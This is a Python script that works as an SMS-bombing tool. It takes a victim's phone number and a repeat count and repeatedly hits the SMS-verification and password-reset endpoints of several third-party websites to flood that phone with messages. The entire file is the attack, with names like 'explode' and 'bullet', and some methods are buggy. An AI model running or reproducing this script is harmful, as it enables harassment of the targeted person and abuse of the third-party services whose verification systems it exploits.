#!/usr/bin/python

import http.cookiejar
import urllib
import urllib.request
import re
import sys
import time
import os
import json

if sys.version.find('3') == 0:
    import urllib.request
    urlrequest = urllib.request
else:
    import urllib2
    urlrequest = urllib2

class blast:
    def __init__(self):
        self.callTime = 0

    def beforeExplosion(self):
        now = time.time()
        if now - self.callTime > self.interval:
            self.callTime = now
            return True
        else:
            return False

    def explode():
        print('abstract method called!')
        

class AnyWlan(blast):
    def __init__(self, opener, phone):
        blast.__init__(self)
        self.url = 'http://forum.anywlan.com/plugin.php?id=comiis_sms&action=register&comiis_tel=%s&secanswer=undefined&secqaahash=undefined&seccodeverify=undefined&seccodehash=undefined&seccodemodid=undefined&inajax=1' % (phone)
        self.opener = opener
        self.limit = False
        self.interval = 60

    def explode(self):
        data = self.opener.open(self.url).read().decode('utf8')
        print('data=' + data)
        return (True, True)
        

class l0044(blast):
    def __init__(self, opener, phone):
        blast.__init__(self)
        verifyCodeUrl = "https://yht.10044.cn/sso/VerifyCode/verifyCodeImage?time=" + str((int)(time.time()))
        vcd = opener.open(verifyCodeUrl).read()
        filePath = sys.path[0] + "/verify.jpg"
        print("file:" + filePath);
        f = open(filePath, 'wb')
        f.write(vcd)
        f.close()
        del f
        if os.name == 'nt':
            os.system('start ' + filePath)
        else:
            os.system('display ' + filePath)

        vc = input('Please input the verify code (' + filePath + '):')
        self.url = 'https://yht.10044.cn/sso/VerifyCode/findPwdSendPhoneVerifiedCode?phones=' + phone + '&code_message=' + vc + '&appId='
        self.opener = opener
        self.interval = 60
        self.limit = False

    def explode(self):
        data = opener.open(self.url).read().decode('utf8')
        print('data=' + data)
        return (True, True)

class DomyShop(blast):
    def __init__(self, opener, phone):
        blast.__init__(self)
        self.url = 'http://www.domyshop.com/Home/User/getMobileCode.html'
        self.opener = opener
        self.interval = 80
        self.limit = True
        self.times = 4

        d = {
            'mobile' : phone,
        }
        self.data = urllib.urlencode(d)

    def explode(self):
        data = self.opener.open(self.url).read().decode('utf8')
        print('data=' + data)
        r = json.loads(data)
        return (r['status'] == 'true')
    

def boomFromAnyWlan(phone):
    url = 'http://forum.anywlan.com/plugin.php?id=comiis_sms&action=register&comiis_tel=%s&secanswer=undefined&secqaahash=undefined&seccodeverify=undefined&seccodehash=undefined&seccodemodid=undefined&inajax=1' % (phone)
    return url

def boomFrom10044Entry(phone, opener):
    verifyCodeUrl = "https://yht.10044.cn/sso/VerifyCode/verifyCodeImage?time=" + str((int)(time.time()))
    print(verifyCodeUrl)

    vcd = opener.open(verifyCodeUrl).read()

    filePath = sys.path[0] + "/verify.jpg"
    print("file:" + filePath);
    f = open(filePath, 'wb')
    f.write(vcd)
    f.close()
    del f

    if os.name == 'nt':
        os.system('start ' + filePath)
    else:
        os.system('display ' + filePath)
    
    vc = input('Please input the verify code (' + filePath + '):')
    return 'https://yht.10044.cn/sso/VerifyCode/findPwdSendPhoneVerifiedCode?phones=' + phone + '&code_message=' + vc + '&appId='
    

def boomSeason(phone, times):
    times = int(times)
    if times <= 0:
        print("times <= 0!")
        return
    
    cookieJar = http.cookiejar.CookieJar()
    handler = urllib.request.HTTPCookieProcessor(cookieJar)
    opener = urllib.request.build_opener(handler)
    
    boom = []
    # 10044
    boom.append(boomFrom10044Entry(phone, opener))
    # AnyWlan
    boom.append(boomFromAnyWlan(phone))

    interval = 60.0 / len(boom)
    while times >= 0:
        for bullet in boom:            
            data = opener.open(bullet).read().decode('utf8')
            print('data=' + data)
            time.sleep(interval)
            times -= 1

            print('times=' + str(times))
        #time.sleep(60)
        #times -= 1

if __name__ == '__main__':
    print('phone=' + sys.argv[1] + ', times=' + sys.argv[2])
    boomSeason(sys.argv[1], sys.argv[2])

